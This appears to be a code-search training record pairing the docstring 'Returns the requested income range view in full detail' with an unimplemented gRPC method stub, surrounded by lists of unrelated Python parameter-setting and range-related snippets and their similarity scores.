for locator of type \" +\n str(type(self)))", "def set_params(self, dic):\n if dic is not None:\n for key, val in zip(dic.keys(), dic.values()):\n if key in self.__dict__.keys():\n if isinstance(self.__dict__[key], Parameter):\n if isinstance(val, Parameter):\n self.__dict__[key] = val\n else:\n d = self.__dict__[key].__dict__\n self.__dict__[key] = Parameter(val, input_dimensional=d['_input_dimensional'],\n units=d['_units'],\n description=d['_description'],\n scale_object=d['_scale_object'],\n return_dimensional=d['_return_dimensional'])\n else:\n self.__dict__[key] = val", "def __init__( self, parameters={} ):\n self.params = {}\n self.reset(parameters)", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params[\"g_leak\"])\n self.kvhh.set_g(params[\"g_kvhh\"])\n self.cav.set_g(params[\"g_cav\"])\n self.kca.set_g(params[\"g_kca\"])\n self.nap.set_g(params[\"g_nap\"])\n self.tau_ca = params[\"t_ca\"]", "def set_params(self, **kwargs):\n if 'nbins' in kwargs:\n self._nbins = kwargs['nbins']\n if self._nbins != 'auto':\n self._nbins = int(self._nbins)\n if 'symmetric' in kwargs:\n self._symmetric = kwargs['symmetric']\n if 'prune' in kwargs:\n prune = kwargs['prune']\n if prune is not None and prune not in ['upper', 'lower', 'both']:\n raise ValueError(\n \"prune must be 'upper', 'lower', 'both', or None\")\n self._prune = prune\n if 'min_n_ticks' in kwargs:\n self._min_n_ticks = max(1, kwargs['min_n_ticks'])\n if 'steps' in kwargs:\n steps = kwargs['steps']\n if steps is None:\n self._steps = [1, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10]\n else:\n self._steps = self._validate_steps(steps)\n self._extended_steps = self._staircase(self._steps)\n if 'integer' in kwargs:\n self._integer = kwargs['integer']", "def init(self, parameters):\n pass", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n valid_params = self.get_params(deep=True)\n\n nested_params = defaultdict(dict) # grouped by prefix\n for key, value in params.items():\n key, delim, sub_key = key.partition('__')\n if key not in valid_params:\n raise EstimatorParameterError(\n 'Invalid parameter %s for estimator %s. '\n 'Check the list of available parameters '\n 'with `estimator.get_params().keys()`.' 
% (key, self))\n\n if delim:\n nested_params[key][sub_key] = value\n else:\n setattr(self, key, value)\n valid_params[key] = value\n\n for key, sub_params in nested_params.items():\n valid_params[key].set_params(**sub_params)\n\n return self", "def set_params(self, params_):\n x_start, x_end = params_[\"lim_fit\"]\n self.find_idx_of_fit_limit(x_start, x_end)\n self.is_error_bar_for_fit = params_[\"use_error_bar\"]\n self.fitting_method1 = params_[\"method1\"]\n self.fitting_method2 = params_[\"method2\"]\n self.qty_to_min = params_[\"qty_to_min\"]\n\n for i, key in enumerate(self.params):\n # self.params[key].set(value=params_[\"val\"][i], min=params_[\"min\"][i], max=params_[\"max\"][i], vary=bool(params_[\"hold\"][i]), brute_step=params_[\"brute_step\"][i])\n if self.params[key].user_data is not None:\n if \"dontGenerate\" in self.params[key].user_data:\n continue\n self.params[key].set(value=params_[key][\"value\"], min=params_[key][\"min\"], max=params_[key][\"max\"], vary=params_[key][\"vary\"], brute_step=params_[key][\"b_step\"])", "def set(self, *, pad=None, w_pad=None, h_pad=None, rect=None):\n for td in self.set.__kwdefaults__:\n if locals()[td] is not None:\n self._params[td] = locals()[td]", "def setup(self, **kwargs):\n\n for k, v in kwargs.items():\n setattr(self, k, v)", "def _set_controller_parameters(self, P=None, I=None, D=None):\n pass", "def set_params(self, dG=None, dH=None, dCp=None ):\n\n\t\tif len(self.dG) > 0 and dG != None:\n\t\t\tassert( len(self.dG) == len(dG) )\n\t\tif len(self.dG) > 0 and dH != None:\n\t\t\tassert( len(self.dG) == len(dH) )\n\t\tif len(self.dG) > 0 and dCp != None:\n\t\t\tassert( len(self.dG) == len(dCp) )\n\n\t\t# note, dG & dH values are always at ref temp!\n\t\tif dG != None:\n\t\t\tself.dG\t\t=\tdG\n\t\tif dH != None:\n\t\t\tself.dH\t\t=\tdH\n\t\tif dCp != None:\n\t\t\tself.dCp\t=\tdCp\n\n\t\treturn", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params['g_leak'])\n self.nav.set_g(params['g_nav'])\n self.kvhh.set_g(params['g_kvhh'])\n self.kva.set_g(params['g_kva'])\n self.kvsi.set_g(params['g_kvsi'])\n self.cav.set_g(params['g_cav'])\n self.kca.set_g(params['g_kca'])\n self.nap.set_g(params['g_nap'])\n self.kir.set_g(params['g_kir'])\n self.ampar.set_g(params['g_ampar'])\n self.nmdar.set_g(params['g_nmdar'])\n self.gabar.set_g(params['g_gabar'])\n self.tau_ca = params['t_ca']", "def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)", "def _set_params(self, *args, **kwargs):\n startup = False\n try:\n params = args[0]\n except IndexError:\n raise InstrumentParameterException('Set command requires a parameter dict.')\n\n try:\n startup = args[1]\n except IndexError:\n pass\n\n # Only check for readonly parameters if we are not setting them from startup\n if not startup:\n readonly = self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY)\n\n log.debug(\"set param, but check visibility first\")\n log.debug(\"Read only keys: %s\", readonly)\n\n for (key, val) in params.iteritems():\n if key in readonly:\n raise InstrumentParameterException(\"Attempt to set read only parameter (%s)\" % key)\n\n # Make sure this method is overloaded because this just verifies, but doesn't\n # 
set a damn thing.", "def set_parameter(self, params, name, val):\n raise NotImplementedError()", "def set(self, params, relink=None):\n # Fast path 'set(get())'-like\n if params is self._params:\n return\n # Assignment\n if (self._config.relink if relink is None else relink):\n tools.relink(self._model.parameters(), params)\n self._params = params\n else:\n self._params.copy_(params, non_blocking=self._config[\"non_blocking\"])", "def set(self, *, h_pad=None, w_pad=None,\n hspace=None, wspace=None, rect=None):\n for td in self.set.__kwdefaults__:\n if locals()[td] is not None:\n self._params[td] = locals()[td]", "def set_params(self, **params):\n\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n valid_params = self.get_params(deep=True)\n\n nested_params = defaultdict(dict) # grouped by prefix\n for key, value in params.items():\n key, delim, sub_key = key.partition('__')\n if key not in valid_params:\n raise ValueError('Invalid parameter %s for regressor %s. '\n 'Check the list of available parameters '\n 'with `regressor.get_params().keys()`.' %\n (key, self))\n\n if delim:\n nested_params[key][sub_key] = value\n else:\n setattr(self._regressor, key, value)\n valid_params[key] = value\n\n for key, sub_params in nested_params.items():\n valid_params[key].set_params(**sub_params)\n\n return self", "def set_params(self, **kwargs):\n\n # We don't want non-functional arguments polluting kwargs\n params = kwargs.copy()\n for k in ['function', 'target']:\n params.pop(k, None)\n\n self.kwargs.update(params)\n BaseEstimator.set_params(self, **kwargs)", "def set_params(self, **kargs):\n\n # may further modify parameters manually\n if len(kargs) > 0:\n for key in kargs:\n if key in self.params[self.profile].keys():\n self.params[self.profile][key] = kargs[key]\n else:\n print '%s not a standard key. Will not be used.' 
% (key)\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def set_parameters(self, create_models=True, **parameters):\n flag_nn_opti = False\n\n # Set attributes\n for param, value in parameters.items():\n if param in self.DEFAULT_VALUES.keys():\n if getattr(self, param) != value:\n # We change param value\n setattr(self, param, value)\n if param in ['hidden_layers', 'lr']:\n flag_nn_opti = True\n\n else:\n raise Exception(f'Parameter {param} not known.')\n\n # Create torch instances\n if create_models and flag_nn_opti:\n self._create_networks_and_optimizer()", "def set_parameters(self, L, r):\n self.L = L\n self.r = r", "def __init__(self, *args, **kwargs):\n self._rcParams = {}\n self.update(*args, **kwargs)", "def set_params(self, **params):\n if not hasattr(self, \"_non_sklearn_base\"):\n return super().set_params(**params)\n if not (\n len(params) == 1 and\n (\"nthreads\" in params or \"n_jobs\" in params)\n ):\n self.is_fitted_ = False\n valid_params = self.get_params(deep=False)\n for k,v in params.items():\n if k not in valid_params:\n raise ValueError(\"Invalid parameter: \", k)\n setattr(self, k, v)\n return self", "def set_params(cls, param_dict):\n for param in param_dict:\n if param in cls.params:\n cls.params[param] = param_dict[param]\n else:\n raise AttributeError(\"Invalid parameter dictionary! Format: {'<param>': <value>}\")", "def _set_parameter(self):\n # Get parameter keys\n self.input_parameter = self.parameter_combobox.currentText()\n self.result_parameter = self.result_parameters[self.input_parameter]\n # Adjust axes labels\n self.ax.set_xlabel('{} steunpunt'.format(self.input_parameter))\n self.ax.set_ylabel('{} uitvoerlocatie'.format(self.input_parameter))\n # Set data\n self._set_data()", "def part(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)" ]
[ "0.8175829", "0.8170592", "0.8165186", "0.79629844", "0.78029823", "0.779995", "0.77458686", "0.7707225", "0.7664552", "0.7520573", "0.7518126", "0.7402048", "0.7351057", "0.7351057", "0.7351057", "0.7351057", "0.7351057", "0.73461854", "0.7336423", "0.73144144", "0.73106277", "0.7305156", "0.7300206", "0.72140133", "0.72101974", "0.71994156", "0.7185727", "0.7180954", "0.71445745", "0.712152", "0.7121462", "0.7114679", "0.7108335", "0.7088777", "0.7067507", "0.7064918", "0.70586973", "0.70278823", "0.69999003", "0.6968022", "0.69621027", "0.69621027", "0.69621027", "0.6945607", "0.6931908", "0.69262046", "0.69183475", "0.690955", "0.69062895", "0.68949413", "0.68939805", "0.68889517", "0.68630797", "0.68554103", "0.68494254", "0.68490183", "0.68422467", "0.68298745", "0.6829119", "0.6820275", "0.6808056", "0.68071645", "0.68029886", "0.6797695", "0.6788277", "0.6785003", "0.6774106", "0.6749564", "0.67452097", "0.6734379", "0.6733487", "0.6729103", "0.6725974", "0.6702557", "0.6701056", "0.6690934", "0.66880435", "0.66664255", "0.6666246", "0.6662569", "0.6643428", "0.664079", "0.6636136", "0.6619069", "0.6616763", "0.66076785", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.65935385", "0.6550173", "0.6548335", "0.65411055", "0.65291655", "0.65221673", "0.64903665" ]
0.0
-1
Returns the requested income range view in full detail.
def GetIncomeRangeView(self, request, context):
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getRange(self):\n return self.range", "def displayActiveRange(selforcls):\n vRange = selforcls.activeRange()\n try:\n vRange = (selforcls.toDisplay(min(vRange)),\n selforcls.toDisplay(max(vRange)))\n except AttributeError:\n pass # toDisplay() only in ParameterFloat\n return vRange", "def get_display_trange(self) -> float:\n return float(self.query(':timebase:range?'))", "def range (self):\n return self._range", "def range (self):\n return self._range", "def range(self):\n return self.range_array", "def _get_sight_range(self):\n raise NotImplementedError", "def range(self):\n \n return self._range", "def test_get_range(self):\n pass", "def get_featureRange(self):\n\n return self.featureRange", "def income_report_gen(start, end):\n payments = get_income(start, end)\n row_title = [\"Name\", \"Boat\", \"Rent Day\", \"Pay Day\", \"Amount\"]\n data = []\n for payment in payments:\n temp = []\n for title, value in payment.items():\n temp.append(str(value))\n data.append(temp)\n row_format = \"{:>15}\" * (len(row_title)+1)\n print(row_format.format(\"\", *row_title))\n total_income = 0\n for i in range(len(data)):\n print(row_format.format(i+1, *data[i]))\n total_income += int(data[i][4])\n print(row_format.format(\"SUM\", *([\"--------------\"] * 4), str(total_income)))", "def get_range(self):\n if self.battery_size == 40:\n range = 150\n elif self.battery_size == 65:\n range = 225\n print(f\"This car can go about {range} miles on a full charge.\")", "def range_(self):\n return self.bset.range_", "def show_total(request):\n user_id = request.user\n end_date = datetime.datetime.utcnow()\n start_date = end_date.replace(day=1,\n hour=datetime.time(0, 0, 0).hour,\n minute=datetime.time(0, 0, 0).minute,\n second=datetime.time(0, 0, 0).second)\n total = 0\n incomes_to_date = IncomeHistory.objects.filter(date__range=(start_date, end_date),\n income_id__owner_id=user_id)\n if not incomes_to_date:\n return HttpResponse(0, status=200)\n\n for income in incomes_to_date:\n if income.is_active:\n total = total + income.value\n return HttpResponse(total, status=200)", "def get_range(self):\r\n\t\tif self.battery_size == 70:\r\n\t\t\trange = 240\r\n\t\telif self.battery_size == 85:\r\n\t\t\trange = 270\r\n\t\t\t\r\n\t\tmessage = \"This car can go approx. 
\" + str(range)\r\n\t\tmessage += \" miles on a full charge.\"\r\n\t\tprint(message)", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f\"This car can go about {range} miles on a full charge\")", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f'This car can go about {range} miles on a full charge.')", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f\"This car can go to about {range} miles on a full charge.\")", "def getRange(self, p_int): # real signature unknown; restored from __doc__\n pass", "def search_geoloc_range_free_loc(request):\n\n template_var = {\n }\n\n return template_var", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f\"This car can go about {range} miles on a full charge.\")", "def roi(self):\n return super().get_queryset().exclude(\n outcome__isnull=True\n ).all().aggregate(\n roi=Sum('profit') / Sum('size_matched')\n )['roi']", "def range(self):\n return self.timerange()", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n \n print(f\"This car can go about {range} miles on a full charge.\")", "def range_table(self):\n raise NotImplementedError('Abstract method.')", "def get_gain_range(self, *args):\n return _uhd_swig.usrp_source_get_gain_range(self, *args)", "def test_data_with_range_view(self):\n\n self.create_model()\n self.create_machine()\n self.insert_data()\n\n date_literal = '%Y-%m-%d'\n start_date = dt.today()\n end_date = start_date + datetime.timedelta(days=1)\n\n self.create_user_account_and_login()\n query_url = self.range_url + '/' + self.data['mid'] + \\\n '/?s=' + dt.strftime(start_date, date_literal) + \\\n '&e=' + dt.strftime(end_date, date_literal)\n\n response = self.client.get(query_url)\n results = json.loads(response.content)\n\n self.assertEquals(len(results), 2)", "def _full_value_range(self):\n min_value, max_value = self._raw_data.data_range\n return max_value - min_value", "def __set_range_to_show(self) -> None:\n cantus_firmus_positions = [\n line_element.scale_element.position_in_semitones\n for line_element in self.cantus_firmus\n ]\n cantus_firmus_lower_bound = min(cantus_firmus_positions)\n cantus_firmus_upper_bound = max(cantus_firmus_positions)\n\n counterpoint_lower_bound = self.lowest_element.position_in_semitones\n counterpoint_upper_bound = self.highest_element.position_in_semitones\n\n self.lowest_row_to_show = min(\n cantus_firmus_lower_bound,\n counterpoint_lower_bound\n )\n self.highest_row_to_show = max(\n cantus_firmus_upper_bound,\n counterpoint_upper_bound\n )", "def get_income(start, end):\n\n payments = session.query(part2.Sailors.name, part2.Payments.bid, part2.Payments.day, part2.Payments.payDay, part2.Payments.amount).\\\n select_from(part2.Payments). \\\n join(part2.Sailors, part2.Sailors.id == part2.Payments.sid). \\\n filter(part2.Payments.day >= start). \\\n filter(part2.Payments.day <= end). 
\\\n all()\n results = []\n for payment in payments:\n results.append({\"name\": payment[0], \"boat\": payment[1], \"rent_day\": payment[2], \"pay_day\": payment[3], \"amount\": payment[4]})\n return results", "def incomeBar(self):\r\n return self._createTextProfile(self.income)", "def _ebit(self):\n return self.net_income + self.tax_expense + self.interest_expense", "def range_field(self):\n return self.db.range_field", "def get_range(self):\n return time_to_range(self.get_time())", "def getFeHRange(brand):\n return feh_range[brand]", "def get_range(self):\n if self.battery_size == 70:\n range = 240\n elif self.battery_size == 85:\n range = 270\n\n message = \"this car can go approximately \"+ str(range)\n message += \" miles on a full charge.\"\n print(message)", "def view(self) -> 'outputs.ViewDefinitionResponse':\n return pulumi.get(self, \"view\")", "def get_range(self):\n if self.battery_size == 70:\n range = 240\n elif self.battery_size == 85:\n range = 270\n \n message = \"This car can go approximately \" + str(range)\n message += \" miles on a full charge.\"\n print(message)", "def getDataRange(self):\n return self._dataRange", "async def getRanges(self, stock, sharesOut, company_name, index, session):\n # if stock got a dot change to dash\n if \".\" in stock:\n stock = stock.replace(\".\", \"-\")\n\n request = await session.request(\n method=\"GET\", url=API.format(stock, \"1604793600\", \"1605571200\")\n )\n dataJson = await request.json()\n try:\n startRange = dataJson[\"chart\"][\"result\"][0][\"meta\"][\"firstTradeDate\"]\n except:\n error = dataJson[\"chart\"][\"error\"][\"description\"]\n print(error)\n # self.df.drop(index=index, inplace=True)\n return\n\n endRange = dataJson[\"chart\"][\"result\"][0][\"meta\"][\"currentTradingPeriod\"][\n \"regular\"\n ][\"end\"]\n if startRange == None or endRange == None:\n print(\"range was not found\")\n return\n\n await self.getData(\n startRange, endRange, stock, sharesOut, company_name, session\n )", "def get_range_info(self):\n with open(self.range_path, 'r') as _file:\n for line in _file.readlines():\n list0 = line.strip().split('-')\n range_dict = {\n 'min': int(list0[0], 16),\n 'max': int(list0[1], 16),\n 'max_offset': int(list0[1], 16) - int(list0[0], 16),\n }\n self.ranges.append(range_dict)", "def ranges(self):\n return self._ranges", "def f_get_range(self, copy=True):\n raise NotImplementedError(\"Should have implemented this.\")", "def _calc_range(self) -> np.ndarray:\n if self._is_ct25k():\n range_resolution = 30\n n_gates = 256\n else:\n n_gates = int(self.metadata[\"number_of_gates\"])\n range_resolution = int(self.metadata[\"range_resolution\"])\n return np.arange(n_gates) * range_resolution + range_resolution / 2", "def get_range(self):\n if self.battery_size == 70:\n range = 240\n elif self.battery_size == 85:\n range = 270\n message = \"This car can go approximately \" + str(range)\n message += \" miles on a full charge.\"\n print(message)", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (disc_low, disc_high,))\n return [h[0] for h in pickup]", "def range(self):\n\n return time_stat(self, stat=\"range\")", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? 
and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (-disc_high, -disc_low))\n return [h[0] for h in pickup]", "def GetTRange(self):\n ...", "def getAFeRange(brand):\n return afe_range[brand]", "def _range_expression(self):\n # using filter expression to define the time range of the query\n # In influx2, range query is in the format\n # range(start:2018-05-22T23:30:00Z, stop: 2018-05-23T00:00:00Z) or\n # range(start: -12h, stop: -15m)\n # with stop parameter being optional\n if self.filter is None:\n return u''\n exp = (self._sql_where_expression(self.filter)).replace('AND',',').split(',')\n return u'|> range({})'.format(u' , '.join([(i.replace('\"','').replace(\"'\",'')) for i in exp if \"start\" in i or \"stop\" in i]))", "def get_outage(self):\r\n try:\r\n assert self._db_connection, {\r\n STATUS_KEY: HTTP_500_INTERNAL_SERVER_ERROR,\r\n MESSAGE_KEY: DB_ERROR}\r\n\r\n if self.equipment == COKE_DRUM_VALUE and self.module == OUTAGE_VALUE:\r\n \"\"\"\r\n This will return the graph data for the selected outage module\r\n \"\"\"\r\n query_params = {\r\n TAG_NAME_REQUEST: self.query_params.GET[TAG_NAME_REQUEST],\r\n START_DATE_REQUEST: self.query_params.GET[START_DATE_REQUEST],\r\n END_DATE_REQUEST: self.query_params.GET[END_DATE_REQUEST]\r\n }\r\n MODULE_LEVEL_MULTILINE_TAG = tuple(LIST_OF_OUTAGE_MODULE_LEVEL_MULTILINE_TAGS_GRAPH)\r\n if MULTILINE_REQUEST in self.query_params.GET:\r\n \"\"\"\r\n This will return the graph data for the actual and predicted tags for the selected outage module \r\n \"\"\"\r\n query_params[MULTILINE_REQUEST] = self.query_params.GET[MULTILINE_REQUEST]\r\n\r\n if query_params:\r\n if START_DATE_REQUEST not in query_params or not query_params[START_DATE_REQUEST] and \\\r\n MULTILINE_REQUEST not in query_params:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_GRAPH_NULL_START_DATE.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n elif query_params[START_DATE_REQUEST] and MULTILINE_REQUEST not in query_params:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_GRAPH.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST],\r\n query_params[START_DATE_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n elif query_params[START_DATE_REQUEST] and query_params[MULTILINE_REQUEST]:\r\n if query_params[TAG_NAME_REQUEST] in LIST_OF_OUTAGE_MODULE_LEVEL_MULTILINE_TAGS_GRAPH:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_MODULE_MULTILINE_GRAPH.format(\r\n self.module,\r\n MODULE_LEVEL_MULTILINE_TAG,\r\n query_params[START_DATE_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n\r\n else:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_GRAPH.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST],\r\n query_params[START_DATE_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n\r\n df_data = pd.DataFrame(graph_data)\r\n min_max = django_search_query_all(\r\n MIN_MAX_DATA.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST]\r\n ))\r\n df_min_max_data = pd.DataFrame(min_max)\r\n graph = []\r\n\r\n if not df_data.empty:\r\n df_data = df_data.where(pd.notnull(df_data) == True, None)\r\n df_data.sort_values(TIMESTAMP_KEY, ascending=True, inplace=True)\r\n df_unit = df_data[UNIT].iloc[0]\r\n df_description = df_data[DESCRIPTION].iloc[0]\r\n df_timestamp = list(dict.fromkeys(list(df_data[TIMESTAMP_KEY])))\r\n\r\n if query_params[TAG_NAME_REQUEST] in LIST_OF_OUTAGE_MODULE_LEVEL_MULTILINE_TAGS_GRAPH:\r\n df_result = df_data.groupby(TAG_NAME_REQUEST)\r\n 
actual_north_data = []\r\n predicted_north_data = []\r\n actual_south_data = []\r\n predicted_south_data = []\r\n if len(df_result) == 2:\r\n df_description = \\\r\n df_data[df_data[TAG_NAME_REQUEST] == query_params[TAG_NAME_REQUEST]][\r\n DESCRIPTION].iloc[0]\r\n df_north_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_north_data = list(df_north_actual['north_drum_tag_value'])\r\n df_north_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_north_data = list(df_north_predicted['north_drum_tag_value'])\r\n df_south_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_south_data = list(df_south_actual['south_drum_tag_value'])\r\n df_south_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_south_data = list(df_south_predicted['south_drum_tag_value'])\r\n elif len(df_result) == 1:\r\n\r\n if df_result[TAG_NAME_REQUEST] == OUTAGE_MODULE_LEVEL_ACTUAL_TAG:\r\n df_description = \\\r\n df_data[df_data[TAG_NAME_REQUEST] == OUTAGE_MODULE_LEVEL_ACTUAL_TAG][\r\n DESCRIPTION].iloc[0]\r\n df_north_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_north_data = list(df_north_actual['north_drum_tag_value'])\r\n df_south_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_south_data = list(df_south_actual['south_drum_tag_value'])\r\n\r\n elif df_result[TAG_NAME_REQUEST] != OUTAGE_MODULE_LEVEL_ACTUAL_TAG:\r\n df_description = \\\r\n df_data[df_data[TAG_NAME_REQUEST] == OUTAGE_MODULE_LEVEL_PREDICTED_TAG][\r\n DESCRIPTION].iloc[0]\r\n df_north_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_north_data = list(df_north_predicted['north_drum_tag_value'])\r\n df_south_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_south_data = list(df_south_predicted['south_drum_tag_value'])\r\n\r\n temp = {\"north_actual\": actual_north_data, \"north_predicted\": predicted_north_data,\r\n \"south_actual\": actual_south_data, \"south_predicted\": predicted_south_data,\r\n \"x_axis\": df_timestamp,\r\n \"unit\": df_unit,\r\n \"description\": df_description}\r\n\r\n else:\r\n temp = {\"y_axis\": list(df_data[TAG_VALUE]), \"x_axis\": df_timestamp,\r\n \"unit\": df_unit, \"description\": df_description}\r\n if not df_min_max_data.empty:\r\n temp[\"min_data\"] = df_min_max_data[MIN_VALUE].iloc[0]\r\n temp[\"max_data\"] = df_min_max_data[MAX_VALUE].iloc[0]\r\n else:\r\n temp[\"min_data\"] = None\r\n temp[\"max_data\"] = None\r\n graph.append(temp)\r\n\r\n return graph\r\n\r\n except AssertionError as e:\r\n log_error(\"Exception due to : %s\" + str(e))\r\n return asert_res(e)\r\n except Exception as e:\r\n log_error(\"Exception due to : %s\" + str(e))\r\n return json_InternalServerError", "def __str__(self) -> str:\n\n return str(tstack([self._domain, self._range]))", "def __call__(self, start: int = 0, end: int = 5):\n pprint(self.data[start:end])", "def get_household_income_columns():\n return {\n 'COUNTY': 'County FIPS Code',\n 'GEOCAT': 'Summary Level',\n 'GEOID': 'State+County FIPS Code',\n 'SAEMHI_LB90': 'Median Household Income Lower Bound for 90% Confidence Interval',\n 'SAEMHI_MOE': 'Median Household Income Margin of Error',\n 'SAEMHI_PT': 'Median Household Income Estimate',\n 'SAEMHI_UB90': 'Median Household Income Upper Bound for 90% Confidence Interval',\n 'SAEPOVALL_LB90': 'All ages in Poverty, Count Lower Bound for 90% Confidence Interval',\n 'SAEPOVALL_MOE': 'All ages in Poverty, Count Margin of Error',\n 
'SAEPOVALL_PT': 'All ages in Poverty, Count Estimate',\n 'SAEPOVALL_UB90': 'All ages in Poverty, Count Upper Bound for 90% Confidence Interval',\n 'SAEPOVRTALL_LB90': 'All ages in Poverty, Rate Lower Bound for 90% Confidence Interval',\n 'SAEPOVRTALL_MOE': 'All ages in Poverty, Rate Margin of Error',\n 'SAEPOVRTALL_PT': 'All ages in Poverty, Rate Estimate',\n 'SAEPOVRTALL_UB90': 'All ages in Poverty, Rate Upper Bound for 90% Confidence Interval',\n 'SAEPOVU_ALL': 'All Ages in Poverty Universe',\n 'STABREV': 'Two-letter State Postal abbreviation',\n 'STATE': 'FIPS State Code',\n 'YEAR': 'Estimate Year',\n }", "def test_get_meta_range(self):\n pass", "def get_genomic_range( self ):\n return self.snv_chrom + ':' + str( self.snv_start ) + '-' + str( self.snv_end )", "def fusion_api_get_vsn_range(self, uri=None, param='', api=None, headers=None):\n return self.vsnrange.get(uri=uri, api=api, headers=headers, param=param)", "def view_insurances(request):\n insurance = Insurance.objects.filter(medical_information=request.user.userprofile.medicalinformation)\n return render(request, 'view_insurances.html', {'insurances': insurance})", "def get_ip_range(self):\n return self._ip_range", "def inconclusive_detail(self) -> 'outputs.InconclusiveDetailResponse':\n return pulumi.get(self, \"inconclusive_detail\")", "def global_range(self):\n raise NotImplementedError", "def fusion_api_get_vmac_range(self, uri=None, param='', api=None, headers=None):\n return self.vmacrange.get(uri=uri, api=api, headers=headers, param=param)", "def get_gain_range(self, *args):\n return _uhd_swig.usrp_sink_get_gain_range(self, *args)", "def get_overview(entities=None):\n \n url = \"{ep}/views/overview\".format(ep=endpoint)\n \n if entities is not None:\n qs = {}\n for e in entities:\n qs.update({'entityId': e})\n \n r = requests.get(url, headers=headers, params=qs)\n else:\n r = requests.get(url, headers=headers)\n \n return r.json()", "def getRangeInches(self) -> float:\n ...", "def targetRange(self):\n return self._getAttribute(Attribute.targetRange)", "def rangeA(self):\r\n if self._range_A is not None:\r\n return round(self._range_A,2)\r\n else:\r\n return self._range_A", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def GetScalarRange(self):\n ...", "def index_as_range(self):\n return self.index().as_timerange() if self.index() else None", "def lrange(self, name, start, end):\r\n return self.format_inline('LRANGE', name, start, end)", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def open_range(start, stop, step):\n return np.arange(start, stop+step/2, step)", "def income(self, fromdt, todt):\r\n return self._buildTransDict(fromdt, todt, Income)", "def GetView(self):\r\n return self.model.GetView()", "def _get_view(self, cursor):\n raise NotImplementedError", "def get_display_price_data(self, source, commitment):\n overage, included = self.get_price_data(source, commitment)\n if self.name == 
